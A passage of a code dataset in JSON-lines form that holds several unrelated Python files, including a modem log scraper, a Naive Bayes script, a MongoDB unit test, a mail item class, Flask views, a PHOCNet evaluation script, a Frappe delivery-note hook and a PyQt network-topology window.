down)\n down = list(zip(down, down_channels[1:]))\n scraper.write_to_log(down, str(downstream[0]))\n\n\n scraper.check_limits(upstream, upstream_high, upstream_low, up)\n up = list(zip(up, up_channels[1:]))\n scraper.write_to_log(up, str(upstream[0]))\n\n\n scraper.check_limits(snr, snr_high, snr_low, noise)\n noise = list(zip(noise, down_channels[1:]))\n scraper.write_to_log(noise, str(snr[0]))\n\n unerrored = scraper.get_average(unerrored)\n correctable = scraper.get_average(correctable)\n uncorrectable = scraper.get_average(uncorrectable)\n\n errors= []\n scraper.get_errors(unerrored, correctable, uncorrectable, errors)\n with open(\"modem.log\", \"a\") as f:\n f.write('-- Error Correction --\\n')\n f.write(errors[0] + '\\n')\n f.write('--------------------------------------------\\n')\nexcept:\n with open(\"modem.log\", \"a\") as f:\n f.write('--------------------------------------------\\n')\n f.write('--Something went wrong ' + date + ' --\\n')\n f.write('--------------------------------------------\\n')\n","sub_path":"surfboard_log.py","file_name":"surfboard_log.py","file_ext":"py","file_size_in_byte":5238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"526095919","text":"# This program read data from the CSV file and uses a Naive Bayes Multinomial model to \n# fit to the data and predic the results. Then tries to predict the results for the same \n# samples used for training and calculate the hit rate\nfrom readCSV import loadCSVFile\n\nX,Y = loadCSVFile('dataSnake.csv')\n\nfrom sklearn.naive_bayes import MultinomialNB \n\nmodel = MultinomialNB()\nmodel.fit(X, Y)\nresult = model.predict(X)\n\ndiferents = result - Y\nright = [d for d in diferents if d == 0]\n\nrightRate = 100*len(right)/len(X)\n\nprint(rightRate) ","sub_path":"ClassificationUsingCSV.py","file_name":"ClassificationUsingCSV.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"574085120","text":"\"\"\"\nOrders training data to evenly distribute class coverage for each training fold.\n\nAuthor: Jake Lepere\nDate: 09/03/2018\n\"\"\"\nimport numpy as np\n\ndef order_input(images, masks, depths, num_folds=5, by='mask_count'):\n \"\"\"\n Evenly spreads out the input data to maximize class coverage for all training folds.\n\n Args:\n images: the images\n masks: the masks\n depths: the depths\n num_folds: the number of validation folds\n by: arrange by 'mask_count' or 'depth'\n \"\"\"\n\n # number of training examples\n num_examples = images.shape[0]\n\n # sort the data by weighting the mask and depth, where depth is the tie breaker if the mask sum is the same\n min_depth = np.amin(depths)\n max_depth = np.amax(depths)\n sorted_indexes = np.argsort([np.sum(masks[i]) + (depths[i] - min_depth)/(max_depth - min_depth) for i in range(num_examples)])\n\n # indexes after ordering\n ordered_indexes = []\n\n # order the indexes\n for i in range(num_folds):\n \n # starting index\n j = i\n\n # j = (i, i+num_folds, i+2*num_folds, i+3*num_fords, ...)\n while j < num_examples:\n \n # add index\n ordered_indexes.append(j)\n\n # increment\n j += num_folds\n\n # return ordered training data\n return images[ordered_indexes], masks[ordered_indexes], depths[ordered_indexes]\n\n","sub_path":"training_equalization.py","file_name":"training_equalization.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"226151760","text":"__author__ = \"Chloe Parkes\"\n\nimport unittest2 as unittest\nfrom mock import patch\nfrom pymongo import MongoClient\n\nfrom userdetails import UserDetails\nfrom dbfriendslist import DBFriendsList as FriendsList\n\nclass DBFriendsListTest(unittest.TestCase):\n\n _connection_string = 'mongodb://localhost:27017/'\n\n def setUp(self):\n self.test_user = UserDetails(\"TestName\",\n \"TestUsername\",\n \"24/06/94\",\n \"SA1\",\n \"2000\",\n 1,\n 1)\n\n self.client = MongoClient(self._connection_string)\n self.db = self.client['mission']\n self.user_collection = self.db['user']\n\n\n @patch(\"dbuser.DBUser.validate_existing_user\")\n def test_add_to_friends_list(self, validate_existing_user):\n validate_existing_user.return_value = True\n friends_list = FriendsList()\n\n self._setup_tests()\n self.assertEqual(friends_list.add_to_friends_list(\"2000\", \"FriendThree\"), True)\n f = self.user_collection.find_one({'device_id': \"2000\"}, {'friends_list': 1})\n self.assertEqual(f['friends_list'], [\"FriendOne\", \"FriendTwo\", \"FriendThree\"])\n self._teardown_tests()\n\n validate_existing_user.return_value = False\n friends_list2 = FriendsList()\n self.assertEqual(friends_list2.add_to_friends_list(\"100\", \"FriendThree\"), False)\n\n def test_get_friends_list(self):\n friends_list = FriendsList()\n self._setup_tests()\n self.assertEqual(friends_list.get_friends_list(\"2000\"), [\"FriendOne\", \"FriendTwo\"])\n self._teardown_tests()\n\n self._setup_tests_no_friends_list()\n self.assertEqual(friends_list.get_friends_list(\"2000\"), [])\n self._teardown_tests()\n\n def _setup_tests(self):\n self.user_collection.insert_one({\"fname\": self.test_user.fname,\n \"username\": self.test_user.username,\n \"dob\": self.test_user.dob,\n \"post_area\": self.test_user.post_area,\n \"device_id\": self.test_user.device_id,\n \"x_pos\": 0,\n \"y_pos\": 0,\n \"friends_list\": [\"FriendOne\", \"FriendTwo\"]})\n\n def _setup_tests_no_friends_list(self):\n self.user_collection.insert_one({\"fname\": self.test_user.fname,\n \"username\": self.test_user.username,\n \"dob\": self.test_user.dob,\n \"post_area\": self.test_user.post_area,\n \"device_id\": self.test_user.device_id,\n \"x_pos\": 0,\n \"y_pos\": 0})\n\n def _teardown_tests(self):\n self.assertEqual(self.user_collection.remove({'device_id': self.test_user.device_id}), {'ok': 1, 'n': 1})\n\ndef main():\n unittest.main()\n\nif __name__ == '__main__':\n main()","sub_path":"dbfriendslist_test.py","file_name":"dbfriendslist_test.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"489451826","text":"from collections import OrderedDict\nimport json\nimport codecs\n\n\nclass MailItem(object):\n\n DOC_PLAIN = 'PLAINTEXT'\n DOC_HTML = 'HTML'\n DOC_MARKDOWN = 'MARKDOWN'\n DOC_RST = 'RESTRUCTUREDTEXT'\n\n def __init__(self, parent=None, **kwargs):\n self.parent = parent\n\n # Essential\n self.mail_to = []\n self.mail_subject = None\n self.mail_body = None\n\n # Optional\n self.mail_from = None\n self.mail_cc = []\n self.mail_bcc = []\n self.mail_signature = None\n self.mail_attachments = []\n self.mail_embedded = {}\n self.doctype = self.DOC_PLAIN\n\n def get_mailitem(self):\n return {\n \"to\": self.mail_to,\n \"cc\": self.mail_cc,\n \"bcc\": self.mail_bcc,\n \"subject\": self.mail_subject,\n \"body\": self.mail_body,\n \"signature\": self.mail_signature,\n \"attachments\": self.mail_attachments,\n \"embedded\": self.mail_embedded\n }\n\n def set_doctype(self, doctype):\n self.doctype = doctype\n\n def load(self, mailpath=None):\n mailfile = read_json_encoded(mailpath)\n return self.loads(**mailfile)\n\n def loads(self, **kwargs):\n \"\"\"Function reads a dictionary of mail attributes and sets the\n the corresponding MailItem object attributes.\n\n Usage:\n mi = MailItem()\n kwargs = {\n 'to': ['example@email.com'],\n 'subject': 'Test Email',\n 'body': 'Fred,

This is a test email.

',\n 'signature': 'From,
Bob'\n }\n mi.loads(**kwargs)\n\n Args:\n kwargs (dictionary): mail attributes (see below)\n\n Kwargs Keys:\n Required:\n to (list), subject (string), body (string)\n Optional:\n cc (list), bcc (list), signature (string), attachments (list),\n embedded (list)\n\n \"\"\"\n\n print('\\nEVENT: Loading JSON mail data file into MailItem...')\n try:\n if 'to' in kwargs:\n self.mail_to = kwargs['to']\n if 'from' in kwargs:\n self.mail_from = kwargs['from']\n if 'cc' in kwargs:\n self.mail_cc = kwargs['cc']\n if 'bcc' in kwargs:\n self.mail_bcc = kwargs['bcc']\n if 'subject' in kwargs:\n self.mail_subject = kwargs['subject']\n if 'body' in kwargs:\n self.mail_body = kwargs['body']\n if 'signature' in kwargs:\n self.mail_signature = kwargs['signature']\n if 'attachments' in kwargs:\n self.mail_attachments = kwargs['attachments']\n if 'embedded' in kwargs:\n self.mail_embedded = OrderedDict(\n sorted(kwargs['embedded'].items(), key=lambda x: x[1])\n )\n print(\n 'SUCCESS: MailItem loaded!'\n )\n return self\n except KeyError as e:\n print(\n '\\nERROR: A key error occured while '\n 'loading your MailItem.\\n\\t{}'.format(str(e))\n )\n except Exception as e:\n print(\n '\\nERROR: An unknown error occured while '\n 'loading your MailItem.\\n\\t{}'.format(str(e))\n )\n return None\n\n def is_loaded(self):\n \"\"\"Function checks to see if the minimal mail parts are set.\"\"\"\n essential = [\n self.mail_to, self.mail_subject, self.mail_body\n ]\n\n for item in essential:\n if not item:\n return False\n return True\n\n def format_doctype(self):\n doctype = self.doctype.upper()\n if doctype in [self.DOC_PLAIN, 'PT', 0]:\n self.mail_body = \"
\".join(self.mail_body.split('\\n'))\n self.mail_signature = \"
\".join(\n self.mail_signature.split('\\n')\n )\n elif doctype in [self.DOC_HTML, 1]:\n self.mail_body = \"\".join(self.mail_body.split('\\n'))\n self.mail_signature = \"\".join(self.mail_signature.split('\\n'))\n elif doctype in [self.DOC_MARKDOWN, 'MD', 2]:\n pass\n elif doctype in [self.DOC_RST, 'RST', 3]:\n pass\n\n def multi_replace(self, item, *args):\n for oplist in args:\n for tup in oplist:\n item = item.replace(tup[0], tup[1])\n\n def convert_string_to_JSON(self, instr):\n return json.loads(byteify(instr))\n\n def save_to_JSON(self, path=None):\n currmail = self.get_mailitem()\n\n if path:\n with codecs.open(str(path), 'w', encoding='utf8') as fp:\n json.dump(currmail, fp)\n\n def __repr__(self):\n return (\n 'MailItem(**{\"to\": %r, \"cc\": %r, \"bcc\": %r, '\n '\"subject\": %r, \"body\": %r, \"signature\": %r, '\n '\"attachments\": %r, \"embedded\": %r})' % (\n self.mail_to, self.mail_cc, self.mail_bcc, self.mail_subject,\n self.mail_body, self.mail_signature, self.mail_attachments,\n self.mail_embedded\n )\n )\n\n def __str__(self):\n return (\n 'MailItem Attributes:\\nto\\t\\t%s\\ncc\\t\\t%s\\nbcc\\t\\t%s\\n'\n 'subject\\t%s\\nbody\\t\\t%s\\nsignature\\t%s\\nattachments\\t%s\\n'\n 'embedded\\t%s\\n\\n' % (\n self.mail_to, self.mail_cc, self.mail_bcc, self.mail_subject,\n self.mail_body, self.mail_signature, self.mail_attachments,\n self.mail_embedded\n )\n )\n\n\ndef read_json(path):\n \"\"\"Function reads a JSON file and returns the contents of the file.\n\n Args:\n path (string): path to JSON file to read\n\n \"\"\"\n with open(path, 'r') as f:\n return json.load(f, object_pairs_hook=OrderedDict)\n\n\ndef read_json_encoded(path, encoding='utf8'):\n with codecs.open(path, 'r', encoding=encoding) as f:\n return json.load(f, object_pairs_hook=OrderedDict)\n\n\ndef read(path):\n \"\"\"Function reads a file and returns the contents of the file.\n\n Args:\n path (string): path to file to read\n\n \"\"\"\n with open(path) as f:\n return f.read()\n\n\ndef byteify(input):\n if isinstance(input, dict):\n return {\n byteify(key): byteify(value) for key, value in input.iteritems()\n }\n elif isinstance(input, list):\n return [byteify(element) for element in input]\n elif isinstance(input, unicode):\n return input.encode('utf8')\n else:\n return input\n","sub_path":"gkit/mail/mailitem.py","file_name":"mailitem.py","file_ext":"py","file_size_in_byte":6594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"543316439","text":"\"\"\"\nbyceps.blueprints.site.user_group.views\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n:Copyright: 2006-2020 Jochen Kupperschmidt\n:License: Revised BSD (see `LICENSE` file for details)\n\"\"\"\n\nfrom flask import g, request\n\nfrom ....services.user_group import service as user_group_service\nfrom ....util.framework.blueprint import create_blueprint\nfrom ....util.framework.flash import flash_error, flash_success\nfrom ....util.framework.templating import templated\nfrom ....util.views import redirect_to\n\nfrom .forms import CreateForm\n\n\nblueprint = create_blueprint('user_group', __name__)\n\n\n@blueprint.route('/')\n@templated\ndef index():\n \"\"\"List groups.\"\"\"\n groups = user_group_service.get_all_groups()\n\n return {\n 'groups': groups,\n }\n\n\n@blueprint.route('/create')\n@templated\ndef create_form(erroneous_form=None):\n \"\"\"Show a form to create a group.\"\"\"\n if not g.current_user.is_active:\n flash_error(\n 'Du musst angemeldet sein, um eine Benutzergruppe erstellen zu können.'\n )\n return redirect_to('.index')\n\n form = erroneous_form if erroneous_form else CreateForm()\n\n return {\n 'form': form,\n }\n\n\n@blueprint.route('/', methods=['POST'])\ndef create():\n \"\"\"Create a group.\"\"\"\n if not g.current_user.is_active:\n flash_error(\n 'Du musst angemeldet sein, um eine Benutzergruppe erstellen zu können.'\n )\n return redirect_to('.index')\n\n form = CreateForm(request.form)\n\n creator = g.current_user\n title = form.title.data.strip()\n description = form.description.data.strip()\n\n group = user_group_service.create_group(creator.id, title, description)\n\n flash_success(f'Die Gruppe \"{group.title}\" wurde erstellt.')\n return redirect_to('.index')\n","sub_path":"byceps/blueprints/site/user_group/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"98161740","text":"import data\n\nfrom classes.Creature import Player\n\nfrom classes.Item import *\nfrom classes.Thing import *\n\ndataObj = data.dataObj\nplayers = {}\nfor playerId, playerData in dataObj['players'].items():\n\tif playerData['state'] == 'active':\n\t\t# instantiate player\n\t\tplayers[playerId] = Player({'id' : playerId })\n\n\t\t# instantiate nested classes (\"objects\"), e.g. items\n\n\t\tfor containerKey, items in playerData['objects'].items():\n\n\t\t\tfor objectId, objectData in items.items():\n\n\t\t\t\tif containerKey == 'items':\n\t\t\t\t\tif objectData['types']['primary'][0] == 'weapon':\n\t\t\t\t\t\tobjectClass = Weapon\n\t\t\t\t\telse:\n\t\t\t\t\t\tobjectClass = genericItem\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\t# other class associations here\n\t\t\t\t\tobjectClass = Thing\n\n\t\t\t\tplayers[playerId].add( \n\t\t\t\t\t\tcontainerKey, \n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tobjectId: objectClass( {\n\t\t\t\t\t\t\t\t'id': objectId,\n\t\t\t\t\t\t\t\t'dataPath': 'players/'+playerId+'/objects/'+containerKey+'/'+objectId\n\t\t\t\t\t\t\t} )\n\t\t\t\t\t\t}\n\t\t\t\t)\n\n\t\t\nfrom classes.Map import MapTile\n\nmap = {}\nfor x, row in dataObj['map'].items():\n\tmap[x] = {}\n\tfor y, mapTileObj in row.items():\n\t\tmap[x][y] = MapTile({'x':x, 'y':y})\n\n\n\t\ttry:\n\t\t\tfor containerKey, items in mapTileObj['objects'].items():\n\t\t\t\tfor objectId, objectData in items.items():\n\n\t\t\t\t\tif containerKey == 'items':\n\t\t\t\t\t\tif objectData['types']['primary'][0] == 'weapon':\n\t\t\t\t\t\t\tobjectClass = Weapon\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tobjectClass = genericItem\n\t\t\t\t\telse:\n\t\t\t\t\t\tobjectClass = Thing\n\t\t\t\t\t\n\t\t\t\t\tmap[x][y].add(\n\t\t\t\t\t\tcontainerKey,\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tobjectId: objectClass( {\n\t\t\t\t\t\t\t\t'id': objectId,\n\t\t\t\t\t\t\t\t'dataPath': 'map/'+str(x)+'/'+str(y)+'/objects/'+containerKey+'/'+objectId\n\t\t\t\t\t\t\t})\n\t\t\t\t\t\t}\n\t\t\t\t\t)\n\t\texcept KeyError:\n\t\t\tpass","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"144885546","text":"'''\nCreated on Jun 3, 2019\n\n@author: fwolf\n'''\n\nimport argparse\nimport copy\nimport logging\n\nfrom torch.utils.data import DataLoader\n\nfrom cnn.models.myphocnet import PHOCNet\nfrom doc_analysis.evaluation.phocnet_evaluator import PHOCNet_Evaluator\nfrom seg_based.datasets.botany import BOTDataset\nfrom seg_based.datasets.gw import GWDataset\nfrom seg_based.datasets.hwsynth import HWSynthDataset\nfrom seg_based.datasets.iam import IAMDataset\nfrom seg_based.datasets.rimes import RimesDataset\nfrom utils.save_load import my_torch_load\n\n\ndef load_phocnet(path, phoc_size=540):\n '''\n Loads standard PHOCNet Architecture\n\n @param path: path to the weight file (.pt)\n @param phoc_size: size of the embedding size (number of network outputs)\n\n '''\n cnn = PHOCNet(phoc_size,\n input_channels=1,\n gpp_type='gpp',\n pooling_levels=([1], [5]))\n\n cnn.init_weights()\n\n my_torch_load(cnn, path)\n return cnn\n\ndef load_dataset(dataset, split=None):\n '''\n Loads test dataset for evaluating word spotting and recogntion.\n If available a query loader is initialiazed.\n\n @param dataset: name of the test set. Options: gw, iam, rimes, bot, hwsynth\n @param split: if available defines split of the dataset\n\n '''\n\n\n qry_loader = None\n\n if dataset == 'gw':\n data_root_dir = '/vol/corpora/document-image-analysis/gw'\n test_set = GWDataset(gw_root_dir=data_root_dir,\n split_idx=int(split))\n\n if dataset == 'iam':\n data_root_dir = '/vol/corpora/document-image-analysis/iam-db'\n test_set = IAMDataset(iam_root_dir=data_root_dir,\n remove_punctuation=True)\n\n if dataset == 'rimes':\n data_root_dir = '/vol/corpora/document-image-analysis/rimes/original/icdar2011/'\n test_set = RimesDataset(rimes_root_dir=data_root_dir,\n ignore_diacrits=True)\n\n if dataset == 'hwsynth':\n data_root_dir = '/vol/corpora/document-image-analysis/hw-synth'\n test_set = HWSynthDataset(hw_root_dir=data_root_dir,\n split=split)\n if dataset == 'bot':\n data_root_dir = '/vol/corpora/document-image-analysis/competition_icfhr2016/'\n test_set = BOTDataset(bot_root_dir=data_root_dir)\n\n qry_set = copy.copy(test_set)\n qry_set.mainLoader(partition='qbe', transforms=None)\n qry_loader = DataLoader(qry_set,\n batch_size=1,\n shuffle=False,\n num_workers=8)\n\n test_set.mainLoader(partition='test', transforms=None)\n test_loader = DataLoader(test_set,\n batch_size=1,\n shuffle=False,\n num_workers=8)\n\n return test_loader, qry_loader\n\n\n\ndef evaluate():\n '''\n Evaluate standard PHOCNet\n\n Available Protocols: QbE, QbS, WR\n Available Datasets: George Washington, Botany, IAM, Rimes, HW Synth\n\n '''\n logger = logging.getLogger('PHOCNet-Evaluation::eval')\n # argument parsing\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--path', '-p', action='store', type=str,\n default='/vol/models/fwolf/phocnet/PHOCNet_gw1_1001.pt',\n help='The path of the model file')\n parser.add_argument('--dataset', '-ds', choices=['gw', 'iam', 'hwsynth', 'rimes', 'bot'], default='gw',\n help='The dataset to be trained on')\n parser.add_argument('--split', '-s', action='store', type=str, default='1',\n choices=['1','2','3','4','patrec', 'official'],\n help='The split of the dataset. Default: 1')\n parser.add_argument('--protocol', '-prot', choices=['qbe', 'qbs', 'wr', 'all'], default='all',\n help='The dataset to be trained on')\n parser.add_argument('--gpu_id', '-gpu', action='store',\n type = int, default='5',\n help='The ID of the GPU to use. If not specified, training is run in CPU mode.')\n\n args = parser.parse_args()\n\n\n test_loader, qry_loader = load_dataset(args.dataset, args.split)\n cnn = load_phocnet(args.path, test_loader.dataset.embedding_size())\n\n evaluator = PHOCNet_Evaluator(cnn, test_loader, args.gpu_id, qry_loader)\n\n if args.protocol == 'qbe':\n map_qbe = evaluator.eval_qbe()\n logger.info('QbE mAP: %3.2f', map_qbe*100)\n if args.protocol == 'qbs':\n map_qbs = evaluator.eval_qbs()\n logger.info('QbS mAP: %3.2f', map_qbs*100)\n if args.protocol == 'wr':\n wer = evaluator.eval_wr()\n logger.info('Recognition WER: %3.2f', wer*100)\n if args.protocol == 'all':\n map_qbe, map_qbs, wer = evaluator.eval()\n logger.info('QbE mAP: %3.2f', map_qbe*100)\n logger.info('QbS mAP: %3.2f', map_qbs*100)\n logger.info('Recognition WER: %3.2f', wer*100)\n\nif __name__ == '__main__':\n logging.basicConfig(format='[%(asctime)s, %(levelname)s, %(name)s] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO)\n\n evaluate()\n","sub_path":"experiments/seg_based/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":5209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"591864220","text":"from __future__ import unicode_literals\nimport frappe\nfrom frappe import _\nfrom hms_tz.nhif.api.healthcare_utils import update_dimensions\n\n\ndef validate(doc, method):\n set_prescribed(doc)\n set_missing_values(doc)\n update_dimensions(doc)\n\n\ndef after_insert(doc, method):\n set_original_item(doc)\n\n\ndef set_original_item(doc):\n for item in doc.items:\n if item.item_code:\n item.original_item = item.item_code\n item.original_stock_uom_qty = item.stock_qty\n doc.save(ignore_permissions=True)\n\n\ndef onload(doc, method):\n for item in doc.items:\n if item.last_qty_prescribed:\n frappe.msgprint(\n _(\"The item {0} was last prescribed on {1} for {2} {3}\").format(\n item.item_code,\n item.last_date_prescribed,\n item.last_qty_prescribed,\n item.stock_uom,\n ),\n )\n\n\ndef set_prescribed(doc):\n if doc.docstatus != 0:\n return\n\n for item in doc.items:\n items_list = frappe.db.sql(\n \"\"\"\n select dn.posting_date, dni.item_code, dni.stock_qty, dni.uom from `tabDelivery Note` dn\n inner join `tabDelivery Note Item` dni on dni.parent = dn.name\n where dni.item_code = %s\n and dn.patient = %s\n and dn.docstatus = 1\n order by posting_date desc\n limit 1\"\"\"\n % (\"%s\", \"%s\"),\n (item.item_code, doc.patient),\n as_dict=1,\n )\n if len(items_list):\n item.last_qty_prescribed = items_list[0].get(\"stock_qty\")\n item.last_date_prescribed = items_list[0].get(\"posting_date\")\n\n\ndef set_missing_values(doc):\n if doc.reference_doctype and doc.reference_name:\n if doc.reference_doctype == \"Patient Encounter\":\n doc.patient = frappe.get_value(\n \"Patient Encounter\", doc.reference_name, \"patient\"\n )\n\n\ndef before_submit(doc, method):\n for item in doc.items:\n if item.is_restricted and not item.approval_number:\n frappe.throw(\n _(\n \"Approval number required for {0}. Please open line {1} and set the Approval Number.\"\n ).format(item.item_name, item.idx)\n )\n\ndef on_submit(doc, method):\n update_drug_prescription(doc)\n\ndef update_drug_prescription(doc):\n frappe.db.sql(\"\"\"\n UPDATE `tabDrug Prescription` dp\n INNER JOIN `tabDelivery Note Item` dni ON dp.name = dni.reference_name\n SET dp.quantity = dni.stock_qty\n WHERE dni.stock_qty != dp.quantity\n AND dni.reference_doctype = \"Drug Prescription\"\n AND dni.parent = '{0}'\"\"\".format(doc.name))","sub_path":"hms_tz/nhif/api/delivery_note.py","file_name":"delivery_note.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"577538432","text":"import sys\nimport json\nimport re\nfrom PyQt5 import QtWidgets, QtGui, QtCore\nfrom communication_networks.topology.topology_types import calc_all_topology, get_optimal_topology\n\n\nclass OptimalTopologyWindow(QtWidgets.QWidget):\n \"\"\"\n Віджет вікна для визначення оптимальної топології\n \"\"\"\n\n def __init__(self, parent):\n super().__init__()\n self.topology_data = None\n if parent:\n self.app_path = parent.app_path\n else:\n self.app_path = '..'\n with open(\"{}/resources/topology_description.json\".format(self.app_path)) as data_file:\n self.topology_data = json.load(data_file)\n\n self.topology_title = None\n self.topology_desc = None\n self.topology_image = None\n self.topology_name = None\n self.node_number = None\n self.max_node_rank = None\n self.max_links = None\n self.max_links_check = None\n self.scroll_area = None\n self.calc_button = None\n self.init_UI()\n self.show()\n\n def init_UI(self):\n \"\"\"\n Ініціалізація інтерфейсу користувача\n \"\"\"\n\n window_grid = QtWidgets.QGridLayout(self)\n window_grid.setSpacing(10)\n input_box = QtWidgets.QFrame(self)\n input_box_layout = QtWidgets.QGridLayout()\n input_box_layout.setColumnStretch(2, 1)\n\n self.topology_name = QtWidgets.QLineEdit(\"Комунікаційна мережа 1\")\n\n self.node_number = QtWidgets.QSpinBox(self)\n self.node_number.setMinimum(1)\n self.node_number.setMaximum(1000000000)\n\n self.calc_button = QtWidgets.QPushButton(\"Обчислити\")\n\n self.max_node_rank = QtWidgets.QComboBox(self)\n self.max_node_rank.addItems(['1', '2', '3', '4', '5', '6', '7', '8', '16', '32'])\n self.max_node_rank.setEditable(False)\n\n self.max_links_check = QtWidgets.QCheckBox(\"Максимально допустима кількість зв'язків\")\n self.max_links_check.toggled.connect(lambda: self.max_links.setEnabled(self.sender().checkState()))\n self.max_links = QtWidgets.QSpinBox(self)\n self.max_links.setMinimum(1)\n self.max_links.setMaximum(1000000000)\n self.max_links.setDisabled(True)\n\n self.topology_title = QtWidgets.QLabel(\"Назва топології\")\n self.topology_title.setFont(QtGui.QFont(\"SansSerif\", 14))\n self.topology_title.setAlignment(QtCore.Qt.AlignCenter)\n self.topology_desc = QtWidgets.QLabel(\"Опис\")\n self.topology_desc.setFont(QtGui.QFont(\"SansSerif\", 12))\n self.topology_desc.setAlignment(QtCore.Qt.AlignCenter)\n self.topology_desc.setWordWrap(True)\n self.topology_image = QtWidgets.QLabel(self)\n self.topology_image.setPixmap(QtGui.QPixmap(None))\n self.topology_image.setScaledContents(True)\n\n input_box_layout.addWidget(QtWidgets.QLabel(\"Назва мережі\"), 0, 0, 1, 1)\n input_box_layout.addWidget(self.topology_name, 0, 1, 1, 1)\n input_box_layout.addWidget(QtWidgets.QLabel(\"Введіть кількість вузлів\"), 1, 0, 1, 1)\n input_box_layout.addWidget(self.node_number, 1, 1, 1, 1)\n input_box_layout.addWidget(QtWidgets.QLabel(\"Максимально допустимий порядок вузла\"), 2, 0, 1, 1)\n input_box_layout.addWidget(self.max_node_rank, 2, 1, 1, 1)\n input_box_layout.addWidget(self.max_links_check, 3, 0, 1, 1)\n input_box_layout.addWidget(self.max_links, 3, 1, 1, 1)\n input_box_layout.addWidget(self.calc_button, 4, 0, 1, 2)\n input_box_layout.addWidget(self.topology_title, 0, 2, 1, 4)\n input_box_layout.addWidget(self.topology_desc, 1, 2, 4, 3)\n input_box_layout.addWidget(self.topology_image, 1, 5, 4, 1)\n\n self.calc_button.clicked.connect(self.find_optimal_topology)\n\n self.scroll_area = QtWidgets.QScrollArea()\n self.scroll_area.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)\n self.scroll_area.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.scroll_area.setWidgetResizable(True)\n \n scroll_layout = QtWidgets.QVBoxLayout()\n\n widget = QtWidgets.QWidget()\n widget.setLayout(scroll_layout)\n self.scroll_area.setWidget(widget)\n\n input_box.setLayout(input_box_layout)\n\n window_grid.addWidget(input_box, 0, 0)\n window_grid.addWidget(QtWidgets.QLabel(\"Результати\"), 1, 0)\n window_grid.addWidget(self.scroll_area, 2, 0)\n self.setLayout(window_grid)\n\n def find_optimal_topology(self):\n \"\"\"\n Повертає оптимальну топологію\n \"\"\"\n node_num = self.node_number.value()\n max_node_rank = int(self.max_node_rank.currentText())\n max_links_num = self.max_links.value() if self.max_links_check.checkState() else 0\n\n # Обчислення всіх топологій\n try:\n result = calc_all_topology(node_num, max_node_rank, max_links_num)\n\n if result:\n # Вибір найкращої топології серед відфільтрованих\n result_topology = get_optimal_topology(result)\n topology_type = result_topology[0]\n name_filter = {\n \"Кубічна n-вимірна решітка\": r\"Кубічна \\d+-вимірна решітка\",\n \"Кубічний n-вимірний тор\": r\"Кубічний \\d+-вимірний тор\"\n }\n for repl, pattern in name_filter.items():\n topology_type = re.sub(pattern, repl, topology_type)\n\n self.topology_title.setText(result_topology[0])\n self.topology_desc.setText(self.topology_data[topology_type][\"description\"])\n self.topology_image.setPixmap(\n QtGui.QPixmap(\"{0}/resources/{1}\".format(self.app_path,\n self.topology_data[topology_type][\"src\"])))\n self.show_table(result_topology)\n self.topology_name.setText(\"Комунікаційна мережа {}\".format(int(self.scroll_area.widget().layout().count() / 2) + 1))\n return result_topology\n else:\n self.topology_title.setText(\"Назва топології\")\n self.topology_desc.setText(\"Опис\")\n self.topology_image.setPixmap(QtGui.QPixmap(None))\n return QtWidgets.QMessageBox.information(QtWidgets.QMessageBox(), \"Інформація\",\n \"Жодна з топологій не задовольняє вимогам\",\n QtWidgets.QMessageBox.Ok)\n except ValueError as ex:\n QtWidgets.QMessageBox.information(QtWidgets.QMessageBox(), \"Помилка\", str(ex), QtWidgets.QMessageBox.Ok)\n\n def show_table(self, result_topology):\n \"\"\"\n Виводить таблицю з результатом\n \"\"\"\n result_table = QtWidgets.QTableWidget(0, 7)\n result_table.horizontalHeader().setSectionResizeMode(QtWidgets.QHeaderView.Stretch)\n result_table.setFont(QtGui.QFont(\"SansSerif\", 9))\n result_table.setSortingEnabled(False)\n result_table.horizontalHeader().setFont(QtGui.QFont(\"SansSerif\", 8))\n result_table.setHorizontalHeaderLabels([\"Назва топології\", \"Кількість вузлів\", \"Кількість зв'язків\",\n \"Максимальний діаметр\", \"Порядок вузлів\", \"Ширина бісекції\",\n \"Коефіцієнт симетрії\"])\n\n row_position = result_table.rowCount()\n result_table.insertRow(row_position)\n for i, p in enumerate(result_topology):\n item = IntTableWidgetItem(str(p), p)\n result_table.setItem(row_position, i, item)\n result_table.setSortingEnabled(True)\n\n # Фіксування висоти таблиці\n table_height = 0\n table_height += result_table.horizontalHeader().sizeHint().height()\n for i in range(result_table.rowCount()):\n table_height += result_table.rowHeight(i)\n result_table.setFixedHeight(table_height)\n\n layout = self.scroll_area.widget().layout()\n layout.addWidget(QtWidgets.QLabel(self.topology_name.text()), 0, QtCore.Qt.AlignTop)\n layout.addWidget(result_table, 1, QtCore.Qt.AlignTop)\n\n\nclass IntTableWidgetItem(QtWidgets.QTableWidgetItem):\n \"\"\"\n Новий віджет для числового змісту клітники таблиці\n \"\"\"\n def __init__(self, text, sort_key):\n 